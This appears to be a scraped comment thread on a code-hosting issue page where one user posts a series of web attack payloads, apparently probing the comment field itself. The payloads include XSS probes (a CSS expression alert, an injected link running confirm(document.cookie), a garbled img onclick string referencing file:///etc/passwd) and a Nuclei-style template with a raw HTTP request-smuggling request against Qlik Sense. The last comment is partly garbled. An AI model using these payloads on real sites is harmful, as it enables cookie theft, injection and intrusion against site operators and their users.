-
💬 @nickharrison2002000html
Click me -
💬 @nickharrison2002000html
<div style="width: expression(alert('XSS'));">Click me</div> -
💬 @nickharrison2002000 -
💬 @nickharrison2002000 -
💬 @nickharrison2002000<a class="author-link gl-hover-text-decoration-underline gl-text-gray-700 js-user-link" data-user-id="3844009" data-username="nickharrison2002000" data-name="nicholas harrison" href="document.querySelector("script").innerHTML=confirm(document.cookie);">document.querySelector("script").innerHTML=confirm(document.cookie);
Edited by nicholas harrison -
💬 @nickharrison2002000 -
💬 @nickharrison2002000id: CVE-2023-XXXXX info: name: Qlik Sense Enterprise - HTTP Request Smuggling (CVE-2023-XXXXX) author: AdamCrosser severity: critical reference: - https://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fixes-for-Qlik-Sense-Enterprise-for-Windows/ta-p/2110801 - https://www.praetorian.com/blog/advisory-qlik-sense/ - https://www.praetorian.com/blog/qlik-sense-technical-exploit - https://www.praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/
http:
-
raw:
-
| HEAD /resources/qmc/fonts/cve-2023-XXXXX.ttf HTTP/1.1 Host: localhost Cookie: X-Qlik-Session=13333333-3333-3333-3333-333333333337 Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ 115.0.5790.110 Safari/537.36 Content-Length: 5 Transfer-Encoding: , chunked,
;
Comment required to properly terminate the request with \r\n
matchers-condition: and matchers:
- type: status
status:
- 400
- type: word
part: header
words:
- "Bad Request"
- type: word
part: header
words:
- "X-Qlik-Session"
-
-
-
💬 @nickharrison2002000&pos;&pos;;/**}&pos/>==0</textarea><a><img href=javascript:; onclick=confirm(1)><img file=file:///etc/passwd></div></div></div></div><file:///{window.location.host}/path-name>file:///${window.location.host}/path-name ;--#~~/
Edited by nicholas harrison
Please register or sign in to comment